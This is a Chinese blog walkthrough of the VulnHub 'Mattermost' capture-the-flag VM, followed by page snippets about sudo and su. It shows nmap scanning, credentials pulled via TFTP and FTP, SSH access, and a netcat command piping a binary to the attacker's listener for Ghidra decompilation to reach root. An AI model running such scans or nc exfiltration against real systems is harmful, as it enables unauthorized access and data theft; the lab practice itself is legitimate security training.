vulnhub之mattermost的实践

VSole2022-04-10 06:58:29

今天实践的是vulnhub的mattermost镜像,下载地址,

https://download.vulnhub.com/enumbox/Mattermost.7z,

用workstation导入成功,先做地址扫描,

sudo netdiscover -r 192.168.137.0/24,

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.137.53,


浏览器访问一下http://192.168.137.53:8065,需要用户名密码登录,

接下来的事情就比较尴尬了,竟然想到可能有udp的tftp服务,

扫描一下,真有,sudo nmap -sU -p 69 192.168.137.53,

登录,下载文件,tftp 192.168.137.53,

get README.md

quit

cat README.md

得到了用户名密码,Admin/ComplexPassword0!,登录8065的界面,

找到一个zoom插件的地方,使能插件后,得到一个url,

访问这个url,http://192.168.137.53/JK94vsNKAns6HBkG/AxRt6LwuA7A6N4gk/index.html,

得到新的用户名密码,ftpuser/ftppassword,登录ftp,

ftp 192.168.137.53

ftpuser

ftppassword

dir

cd users

dir

cd mattermost

dir

get message

bye

cat message

又获取到新的用户名密码,mattermost/Welcome!!!,

这回能ssh登录,登录进去后发现了提示信息,但执行文件说key过期,

ls

cd Desktop

ls

cat README.md

./secret

想办法把secret文件搞出来,kali攻击机上nc -nlvp 1234 > secret,

靶机上,cat secret | nc 192.168.137.141 1234,

kali攻击机上安装反编译软件ghidra,

sudo apt update,sudo apt install ghidra,

cd /usr/share/ghidra,./ghidraRun,

反编译得到key,0xf447,转成10进制,62535,

这回再执行文件,输入正确的key,id一下确认是root,

sudo
本作品采用《CC 协议》,转载必须注明作者和本文链接
Sudo是Linux/Unix系统上常用的工具,管理员可通过它分配给普通用户所需的管理权限,几乎所有的Linux及Unix系统都安装有程序。此基于堆的缓冲区溢出漏洞已隐藏十年之久,利用此漏洞,非特权的本地普通用户可以在主机上获得root特权。相关研究人员已经在Ubuntu 20.04(Sudo 1.8.31)、Debian 10(Sudo 1.8.27)、Fedora 33(Sudo 1.9.2)
sudo 命令只允许使用提升的权限运行单个命令,而 su 命令会启动一个新的 shell,同时允许使用 root 权限运行尽可能多的命令,直到明确退出登录。不过有时间限制,Ubuntu默认为一次时长15分钟。如果后面不加账户时系统默认为root账户,密码也为超级账户的密码。想退回普通账户时可以执行“exit”或“logout” 。要求执行该命令的用户必须在sudoers中才可以。
一名英国安全研究人员今天发现,Sudo应用程序中最近出现的安全漏洞也影响了macOS操作系统,而不仅仅是最初认为的Linux和BSD。Qualys研究人员在上周的 告中表示,他们仅在Ubuntu,Debian和Fedora上测试了该问题。Hickey表示,他测试了CVE-2021-3156漏洞,并发现通过进行一些修改,该安全漏洞也可以用于授予攻击者访问macOS根帐户的权限。苹果在调查报告时拒绝发表评论。
可能你执行了相当多的 sudo 命令,因为你不想一直 sudo su 以 root 身份执行命令。
须安装AFL++,可以使用官方docker镜像;如果已经在本地安装,也可直接使用。测试的场景为,非特权用户输入恶意构造程序执行参数,引起sudo程序崩溃。sudo程序由root用户和其他用户启动的表现是不同的。sudo的所有权是root,但却是由普通用户调用的。argv作为一个指针数组的指针,该指针数组中最后一个指针应为0,其余的每一项为一个字符串指针。注意到afl_init_argv函数中,存在对0x02的判断,编写这个文件的作者解释到,以单独一个0x02作为参数表
据报告,Linux中存在一个高严重性漏洞,低权限攻击者可以利用该漏洞在受影响的系统上获得完整的根访问权限。
环境变量里,如果直接输入?不管用的话,就用绝对路径名的方式:/usr/sbin/useradd?。
之前一直对 su 和 sudo 这两个命令犯迷糊,最近专门搜了这方面的资料,总算是把两者的关系以及用法搞清楚
linux中su与sudo的区别
2021-09-09 09:23:44
首先需要解释下 su 代表什么意思。 之前一直以为 su 是 super user,查阅资料之后才知道原来表示 switch user。 知道 su 是由什么缩写来的之后,那么它提供的功能就显而易见了,就是切换用户。
VSole
网络安全专家